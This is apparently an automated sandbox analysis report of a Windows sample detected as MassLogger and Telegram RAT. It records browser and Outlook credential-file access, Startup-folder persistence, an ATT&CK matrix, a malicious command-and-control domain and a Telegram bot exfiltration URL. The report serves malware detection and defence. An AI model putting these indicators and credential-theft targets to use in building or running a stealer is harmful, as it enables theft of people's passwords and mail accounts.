Source: C:\Users\user\AppData\Roaming\Ticks.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7988, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2517076848.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7988, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7988, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	Windows Management Instrumentation	111 Scripting	211 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
50201668.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Ticks.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://jertcot.shopd	0%	Avira URL Cloud	safe
http://jertcot.shop	100%	Avira URL Cloud	malware
https://oshi.at/Xkqu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
oshi.at	194.15.112.248	true	false	high
reallyfreegeoip.org	104.21.64.1	true	false	high
jertcot.shop	162.254.34.31	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high
https://oshi.at/Xkqu	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354	50201668.exe, 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.telegram.org/bot	InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	false		high
http://jertcot.shopd	InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	InstallUtil.exe, 00000009.00000002.2520728746.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000330D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://oshi.at	50201668.exe, 00000006.00000002.1412323204.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003313000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://jertcot.shop	InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-neti	50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	InstallUtil.exe, 00000009.00000002.2520728746.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000330D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	50201668.exe, 00000006.00000002.1412323204.0000000003241000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003313000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.15.112.248	oshi.at	Ukraine	213354	INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
162.254.34.31	jertcot.shop	United States	64200	VIVIDHOSTINGUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590720
Start date and time:	2025-01-14 14:21:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	50201668.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 425 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:22:54	API Interceptor	101x Sleep call for process: 50201668.exe modified
09:55:54	API Interceptor	30x Sleep call for process: InstallUtil.exe modified
09:55:56	API Interceptor	149x Sleep call for process: Ticks.exe modified
14:23:08	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.15.112.248	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse
	Ref#103052.exe	Get hash	malicious	XWorm	Browse
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse
	Ref_31020563.exe	Get hash	malicious	Unknown	Browse
	Ref#116670.exe	Get hash	malicious	MassLogger RAT	Browse
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse
193.122.130.0	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jertcot.shop	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
jertcot.shop	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
reallyfreegeoip.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
checkip.dyndns.com	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
oshi.at	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	GhwFStoMJX.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	GhwFStoMJX.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	194.15.112.248
	IMG_10503677.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Holiday#3021.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Holiday#3021.exe	Get hash	malicious	Unknown	Browse	5.253.86.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	194.15.112.248
	Ref#103052.exe	Get hash	malicious	XWorm	Browse	194.15.112.248
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	194.15.112.248
	Ref_31020563.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	Ref#116670.exe	Get hash	malicious	MassLogger RAT	Browse	194.15.112.248
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
VIVIDHOSTINGUS	009.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	VYLigyTDuW.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
